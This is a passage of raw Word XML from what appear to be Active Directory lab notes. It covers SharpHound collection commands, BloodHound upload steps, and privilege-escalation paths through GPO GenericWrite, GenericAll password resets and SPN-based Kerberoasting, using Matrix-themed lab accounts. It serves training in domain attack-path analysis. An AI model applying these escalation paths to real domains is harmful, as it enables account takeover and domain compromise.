          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Find Path: ghost → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>GenericWrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> → GPO → Affects → OU → Contains → Workstation Admins → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>AdminTo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Workstation01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7A509805" w:rsidP="5E1249AA" w:rsidRDefault="7A509805" w14:paraId="2D56F5CE" w14:textId="076FE7F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>JohnUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> can modify the GPO to include a scheduled task or startup script to add their account to Administrators on Workstation01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7977A849" w:rsidP="5E1249AA" w:rsidRDefault="7977A849" w14:paraId="7EF1CE82" w14:textId="501AF787">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>SharpHound.exe -c all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="244DABD5" w:rsidP="5E1249AA" w:rsidRDefault="244DABD5" w14:paraId="058E02A8" w14:textId="67C4DBE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">ghost → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>GenericWrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> → GPO → Affects → OU → Contains → Workstation01 → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>HasSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>LabAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E38BBBD" w:rsidP="5E1249AA" w:rsidRDefault="6E38BBBD" w14:paraId="3FB5DCBF" w14:textId="1C3815D2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">SharpHound.exe -C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Sessions,LoggedOn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="7977A849" w:rsidP="5E1249AA" w:rsidRDefault="7977A849" w14:paraId="6BD3B56F" w14:textId="3753C95A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Find: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>morpheus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>GenericAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DanaAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>MemberOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Domain Admins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7977A849" w:rsidP="5E1249AA" w:rsidRDefault="7977A849" w14:paraId="2FF1730B" w14:textId="22A3AC67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:t>Morpheus can:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7977A849" w:rsidP="5E1249AA" w:rsidRDefault="7977A849" w14:paraId="07E8DEC1" w14:textId="20BF6F29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:t xml:space="preserve">Reset </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:t>DanaAdmin’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:t xml:space="preserve"> password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7977A849" w:rsidP="5E1249AA" w:rsidRDefault="7977A849" w14:paraId="04F6543D" w14:textId="2D17DD1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7977A849">
        <w:rPr/>
        <w:t xml:space="preserve">Or, set an SPN and perform </w:t>
      </w:r>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="7977A849">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Kerberoasting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6A80BD1D" w:rsidP="16CDA6DC" w:rsidRDefault="6A80BD1D" w14:paraId="50327265" w14:textId="285611AC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="6A80BD1D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Run Bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6A80BD1D" w:rsidP="16CDA6DC" w:rsidRDefault="6A80BD1D" w14:paraId="0D0FF988" w14:textId="2A9DE07F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="6A80BD1D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Open a web browser and navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="R24bbbba893d1462e">
        <w:r w:rsidRPr="16CDA6DC" w:rsidR="6A80BD1D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://10.0.0.6:8080</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="6A80BD1D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6A80BD1D" w:rsidP="16CDA6DC" w:rsidRDefault="6A80BD1D" w14:paraId="25A7630C" w14:textId="697B2358">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="6A80BD1D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Log into Bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6A80BD1D" w:rsidP="16CDA6DC" w:rsidRDefault="6A80BD1D" w14:paraId="4AB995D9" w14:textId="063B2B68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="6A80BD1D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Under Administration select File Ingestion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4968FA15" w:rsidP="16CDA6DC" w:rsidRDefault="4968FA15" w14:paraId="1264A88B" w14:textId="05FB4EA9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="4968FA15">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Upload the .zip file the Sharphound created on the Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6A80BD1D" w:rsidP="16CDA6DC" w:rsidRDefault="6A80BD1D" w14:paraId="20531F09" w14:textId="306D29F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16CDA6DC" w:rsidR="6A80BD1D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Once complete, select explore and begin queries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="16CDA6DC" w:rsidP="16CDA6DC" w:rsidRDefault="16CDA6DC" w14:paraId="42533EB7" w14:textId="3DA79546">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7EC1AF75" w:rsidP="5E1249AA" w:rsidRDefault="7EC1AF75" w14:paraId="34EB101C" w14:textId="7FED630C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Food For Thought</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EC1AF75" w:rsidP="5E1249AA" w:rsidRDefault="7EC1AF75" w14:paraId="3C589031" w14:textId="4C36A3CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">Morpheus has </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GenericAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> over Neo, so:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EC1AF75" w:rsidP="5E1249AA" w:rsidRDefault="7EC1AF75" w14:paraId="585D88BD" w14:textId="638EEAF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>He can reset the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EC1AF75" w:rsidP="5E1249AA" w:rsidRDefault="7EC1AF75" w14:paraId="510C83FE" w14:textId="4D8FFF1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">But if </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Neo is logged in somewhere</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>, Morpheus can target that system directly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="506A3941" w:rsidP="5E1249AA" w:rsidRDefault="506A3941" w14:paraId="765C7B76" w14:textId="165F0021">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="281" w:after="281"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bloodhound Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EC1AF75" w:rsidP="5E1249AA" w:rsidRDefault="7EC1AF75" w14:paraId="765947C3" w14:textId="3EE7B2D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">Path: Morpheus </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>GenericAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Neo</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="69D74C70">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>HasSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="7500EA72">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>NEBUCHADNEZZAR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EC1AF75" w:rsidP="5E1249AA" w:rsidRDefault="7EC1AF75" w14:paraId="71E27B9F" w14:textId="068BF8F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">Or: </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="2A14CB3B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">Morpheus </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
